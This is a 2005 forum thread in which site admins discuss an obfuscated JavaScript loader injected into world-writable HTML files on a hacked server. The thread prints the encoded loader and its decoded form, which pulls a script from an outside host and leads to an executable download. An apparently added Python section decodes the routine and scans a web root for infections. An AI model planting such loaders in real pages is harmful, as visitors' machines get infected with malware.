hacked on my server....

Discussion in 'Site & Server Administration' started by RectangleMan, Jul 28, 2005.

  1. #1
    So today while checking around I found this in an HTML source file. The first part is what was there... the second part is the script unencoded. So I did a grep for 'document.write(unescape' and found a handful of sites that back in May/June were exploited. It seems this little script wrote itself to any files on the server that it had permission to. A few of my sites have safe_mode off (very few) and those that had public write permissions (666 or 777) had this added to the header. I went and cleaned it all up, and of course I corrected any files that were public write. Does anyone know anything more about what this piece of code is supposed to do? I know an exploit exists in IE that this code, I think, makes use of. Luckily I don't use IE :)

    Anyone want to take a stab at this? I bet I was exploited from phpbb before I updated. There was a week I took to do a critical update. When you have 200 sites and dozens of scripts it's hard to keep up with new updates and exploits.


    <script language=javascript>document.write(unescape('%3C%73%63%72%69%70%74%20%6C
    %61%6E%67%75%61%67%65%3D%22%6A%61%76%61%73%63%72%69%70%74%22%3E%66%75%6E%63%74%6
    9%6F%6E%20%64%46%28%73%29%7B%76%61%72%20%73%31%3D%75%6E%65%73%63%61%70%65%28%73%
    2E%73%75%62%73%74%72%28%30%2C%73%2E%6C%65%6E%67%74%68%2D%31%29%29%3B%20%76%61%72
    %20%74%3D%27%27%3B%66%6F%72%28%69%3D%30%3B%69%3C%73%31%2E%6C%65%6E%67%74%68%3B%6
    9%2B%2B%29%74%2B%3D%53%74%72%69%6E%67%2E%66%72%6F%6D%43%68%61%72%43%6F%64%65%28%
    73%31%2E%63%68%61%72%43%6F%64%65%41%74%28%69%29%2D%73%2E%73%75%62%73%74%72%28%73
    %2E%6C%65%6E%67%74%68%2D%31%2C%31%29%29%3B%64%6F%63%75%6D%65%6E%74%2E%77%72%69%7
    4%65%28%75%6E%65%73%63%61%70%65%28%74%29%29%3B%7D%3C%2F%73%63%72%69%70%74%3E'));
    dF('*8HXHWNUY*75QFSLZFLJ*8I*7%3Cof%7Bfxhwnuy*7%3C*75XWH*8I*7%3Cmyyu*8F44gfwfxtx3
    htr4ytu4ktyt3ox*7%3C*8J*8H4XHWNUY*8J*5I*5F5')</script>


    <script language=javascript>document.write(unescape('<script language="javascript">
    function dF(s){var s1=unescape(s.substr(0,s.length-1)); var t='';for(i=0;i<s1.length;i++)t+=String.fromCharCode(s1.charCodeAt(i)-s.substr(s.length-1,1));document.write(unescape(t));}</script>'));
    dF('*8HXHWNUY*75QFSLZFLJ*8I*7<of{fxhwnuy*7<*75XWH*8I*7<myyu*8F44gfwfxtx3htr4ytu4ktyt3ox*7<*8J*8H4XHWNUY*8J*5I*5F5')</script>

    RectangleMan, Jul 28, 2005 IP
  2. J.D.

    #2
    It's not IE - any browser that visits your site will be affected. This script encodes the following string

    <SCRIPT LANGUAGE='javascript' SRC='http:// *******.com/top/foto.js'></SCRIPT>

    which will make any browser go to their site (located in China) and pick up a bigger script. The bigger script will try to set a cookie called jkpopup and creates a hidden iframe that points to a PHP script on the same site.

    The source of the iframe is yet another script that encrypts HTML, which loads a couple of other scripts and executes a Java applet that pulls an executable from their website called web.exe.

    After this, your machine is under their total control.

    J.D.
     
    J.D., Jul 28, 2005 IP
    classifieds likes this.
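The two posts above describe the same thing from two ends: the injected `document.write(unescape(...))` loader with its `dF()` shift decoder, and the `<SCRIPT SRC=...>` tag it unpacks to. Below is an added example, not code from the thread or from the posters, of a small cleanup scanner a server admin could run over a web root. It re-implements the `dF()` decoding quoted above (last character is the shift key, unescape, shift down, unescape again), reports every file that carries the loader together with the remote script URL the `dF()` argument decodes to, and flags world-writable files, since the first post says only 666/777 files were hit. The sample web root, the payload host `example.invalid` and the key `5` are constructed for the demo; the real host from the thread is redacted there and is not reproduced here.

```python
import os
import re
import stat
import tempfile
from urllib.parse import unquote

# Constructed sample payload: same shape as the tag J.D. quotes, placeholder host.
SAMPLE_PAYLOAD = "<SCRIPT LANGUAGE='javascript' SRC='http://example.invalid/top/foto.js'></SCRIPT>"
SAMPLE_KEY = 5  # constructed; the key is the last character of the dF() argument

LOADER_RE = re.compile(r"document\.write\s*\(\s*unescape\s*\(", re.IGNORECASE)
DF_CALL_RE = re.compile(r"dF\('([^']*)'\)")
SRC_RE = re.compile(r"""SRC=['"]([^'"]+)['"]""", re.IGNORECASE)

_JS_ESCAPE_SAFE = set("@*_+-./")  # characters JavaScript escape() leaves alone


def js_escape(text: str) -> str:
    """Approximation of JavaScript escape() for code points below 256."""
    return "".join(
        c if (c.isascii() and c.isalnum()) or c in _JS_ESCAPE_SAFE else f"%{ord(c):02X}"
        for c in text
    )


def df_encode(plain: str, key: int) -> str:
    """Inverse of dF(): escape, shift each code point up by key, escape again,
    append the key. Used here only to build the constructed sample file."""
    shifted = "".join(chr(ord(c) + key) for c in js_escape(plain))
    return js_escape(shifted) + str(key)


def df_decode(arg: str) -> str:
    """Python re-implementation of the thread's dF() routine."""
    key = int(arg[-1])                    # trailing digit is the shift
    s1 = unquote(arg[:-1])                # first unescape()
    t = "".join(chr(ord(c) - key) for c in s1)  # shift every char back down
    return unquote(t)                     # second unescape() yields the HTML


def scan_file(path: str) -> dict:
    """Check one file for the loader, decode any dF() call, and note 666/777 mode."""
    with open(path, "r", encoding="utf-8", errors="replace") as fh:
        content = fh.read()
    decoded = []
    for arg in DF_CALL_RE.findall(content):
        try:
            decoded.append(df_decode(arg))
        except ValueError:                # dF() call whose last char is not a digit
            continue
    return {
        "path": path,
        "has_loader": bool(LOADER_RE.search(content)),
        "decoded_payloads": decoded,
        "remote_scripts": [u for d in decoded for u in SRC_RE.findall(d)],
        "world_writable": bool(os.stat(path).st_mode & stat.S_IWOTH),
    }


def scan_tree(root: str, exts=(".html", ".htm", ".php", ".js")) -> list:
    """Walk a web root and return only the files that need attention."""
    findings = []
    for dirpath, _, files in os.walk(root):
        for name in files:
            if name.lower().endswith(exts):
                result = scan_file(os.path.join(dirpath, name))
                if result["has_loader"] or result["decoded_payloads"] or result["world_writable"]:
                    findings.append(result)
    return findings


def build_demo_tree() -> str:
    """Constructed web root: one injected header left at 0666, one clean 0644 page."""
    root = tempfile.mkdtemp(prefix="scan-demo-")
    injected = (
        "<script language=javascript>document.write(unescape('%3Cscript%3E...%3C/script%3E'));"
        f"dF('{df_encode(SAMPLE_PAYLOAD, SAMPLE_KEY)}')</script>\n"
        "<html><body>hello</body></html>\n"
    )
    bad = os.path.join(root, "header.html")
    with open(bad, "w", encoding="utf-8") as fh:
        fh.write(injected)
    os.chmod(bad, 0o666)
    good = os.path.join(root, "index.html")
    with open(good, "w", encoding="utf-8") as fh:
        fh.write("<html><body>clean page</body></html>\n")
    os.chmod(good, 0o644)
    return root


if __name__ == "__main__":
    for f in scan_tree(build_demo_tree()):
        flags = [k for k in ("has_loader", "world_writable") if f[k]]
        print(f["path"], flags, f["remote_scripts"])
```

Point `scan_tree()` at a real document root instead of `build_demo_tree()` to use it; the `world_writable` flag on its own is worth acting on even where no loader is found, since that is the permission the thread's injection depended on. The encoder is only there so the demo can build its sample; `df_encode("<S", 5)` yields `*8HX5`, the same `*8HX` prefix visible in the posted `dF()` argument, which is a quick way to confirm the decoder matches the page's routine.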
  3. fryman

    #3
    That is scary... Labrocca, how did you find this? I guess I'd better go check out my pages
     
    fryman, Jul 28, 2005 IP
  4. yo-yo

    #4
    When a huge exploit came out on phpbb that I didn't update quickly enough, my site's home page was taken down and they added an entire directory of scripts in my forum/ folder that allowed them to upload files to my server and steal all my bandwidth. I obviously knew they had hacked me because they took down the home page.. so I was able to delete (what I think) was everything they added.

    Hackers are the biggest scum on earth... like meth heads.
     
    yo-yo, Jul 28, 2005 IP
  5. RectangleMan

    #5
    Hmm... thanks for the info. I am glad I cleaned up my server. I sure wish I had found this earlier; luckily it was mostly written to weird pages that rarely get hit. I use Opera and I run AVG. I also have firewalls up at my house.

    I don't think the script did any serious harm. The hard part is making sure I have the exploit plugged.
     
    RectangleMan, Jul 28, 2005 IP